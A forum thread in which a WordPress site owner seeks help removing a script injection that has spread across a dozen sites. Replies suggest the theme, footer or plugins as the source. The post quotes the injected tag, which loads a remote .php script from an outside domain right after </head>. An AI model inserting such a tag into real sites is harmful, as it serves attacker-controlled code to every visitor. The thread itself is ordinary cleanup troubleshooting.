I've tried replacing all the files with a new fresh download from Wordpress and it STILL doesn't seem to get rid of it. Last time this happened, that seemed to work but I have no clue where this nasty little bug is in the code to get rid of it. Here's where it "lives" on the website: </head><script src=http://elpotrero.com.ar/seleccion/Maradona-Marsella.php ></script> <body> Code (markup): It's infected a dozen of my sites...EEK! ...and I can't seem to figure out what file to get the infection off of.
Post </head>, that means it must be part of your theme. Try checking header.php in your theme files for that script.
It's after the </head> ...look at the above code again. Just to show though, this is what is in my header.php file: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" <?php language_attributes(); ?>> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" /> <title><?php if (is_home () ) { bloginfo('name'); echo " - "; bloginfo('description'); } else { wp_title('',true); echo " - "; bloginfo('name'); }?></title> <link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" /> <link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> RSS Feed" href="<?php bloginfo('rss2_url'); ?>" /> <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" /> <!-- Additional IE/Win specific style sheet (Conditional Comments) --> <!--[if lte IE 7]> <link rel="stylesheet" href="<?php bloginfo('template_url'); ?>/styleie.css" type="text/css" media="projection, screen"> <![endif]--> <?php wp_head(); ?> </head> <body> <div id="wrap"> <div class="header"> <div class="titles"> <h1><a href="<?php bloginfo('url'); ?>" title="<?php bloginfo('name'); ?>"><?php bloginfo('name'); ?></a></h1> <p><?php bloginfo('description'); ?></p> </div> <div class="searchbar"> <span>Search</span> <form method="get" id="searchtop" action="<?php bloginfo('home'); ?>/"><input name="s" type="text" id="s" onfocus="if (this.value == 'to search, type and hit enter') {this.value = '';}" onblur="if (this.value == '') {this.value = 'to search, type and hit enter';}" value="to search, type and hit enter" size="28" /></form> <div class="clear"></div> </div> <div class="clear"></div> </div> <div class="menu"> <ul> <li class="page_item<?php if (is_home() || is_single()) {echo ' current_page_item';} ?>"><a href="<?php bloginfo('url'); ?>">Homepage</a></li> <li> <a href="/about">About</a> </li> <!-- <?php wp_list_pages('sort_column=menu_order&title_li=&depth=1'); ?> --> <div style="clear:both;"></div> </ul> </div> <br/> <div id="content"> Code (markup):
Ok, that means that, at some point before the output is sent to the browser, some piece of code does a str_replace(), replacing </head> with </head><script ...>. Check if there isn't any malicious code in your footer, try disabling your plugins (are there plugins/themes you use across all your sites?). Failing that, I have no idea.